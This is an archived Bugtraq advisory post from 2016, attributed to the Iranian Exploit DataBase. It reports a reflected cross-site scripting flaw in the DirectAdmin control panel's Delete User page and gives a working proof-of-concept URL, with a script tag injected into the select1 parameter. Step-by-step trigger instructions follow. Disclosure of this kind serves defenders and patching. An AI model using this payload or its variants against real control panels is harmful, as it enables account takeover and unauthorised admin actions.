lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 10 Apr 2016 12:40:38 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Directadmin cp ( Delete User ) 1.50.0 Version Xss Vulnerability

Xss Vulnerability in Directadmin cp ( Delete User ) on 1.50.0 And Old Version

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Directadmin cp ( Delete User ) 1.50.0 Version Xss Vulnerability

# Directadmin Version : 1.50.0 And Old Version

# Testet On : Centos 5 and 6 - Directadmin 1.50.0

# Vendor site : http://www.directadmin.com

# Pic : http://kkli.ir/VPFl5

# Author : Amir ( Iedb.Ir And IrIsT.Ir )

# Site : Www.IeDb.Ir   -   Www.IeDb.Ir/acc   -   xssed.Ir   -   kkli.ir  -  irist.ir

# Vulnerability attack information site : http://xssed.Ir/

# Site And Forum : http://iedb.ir & http://iedb.ir/acc

# Archive Exploit = http://iedb.ir/exploits-5004.html

#####################################

Bug :

http://ip:2222[port]/CMD_SELECT_USERS?select1=iedb.ir'"><script>alert('Directadmin Xss - By Amir - Iedb.Ir')</script>&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW

Xss In Directadmin - Picture :

http://up.iedb.ir/uploads/directadmin-xss-Bug-by-iedb-ir.jpg

-------------

Description :

To use this bug, you must first Login the admin user has gone DirectAdmin control panel.
Then you go to the following:
Show All Users

Then select a user and click on the delete option.

Then open the link where you can enter your code xss.

http://ip:2222[port]/CMD_SELECT_USERS?select1=Site'"><script>alert('Directadmin Xss - By Amir - Iedb.Ir')</script>&reason=none&delete=Delete&location=CMD_ALL_USER_SHOW

Photo: http://kkli.ir/bIyCB

This bug has been tested and works on the new version of DirectAdmin.

There are other versions of this security problem.

Iedb.Ir And IrIsT.Ir Security And Exploit Team ==>> http://iedb.ir And http://irist.ir

Thanks to all my friends and team managers Security http://iedb.ir And http://iedb.ir/acc And http://xssed.ir

#####################################

#  Archive Exploit = http://kkli.ir/liZLC

#####################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ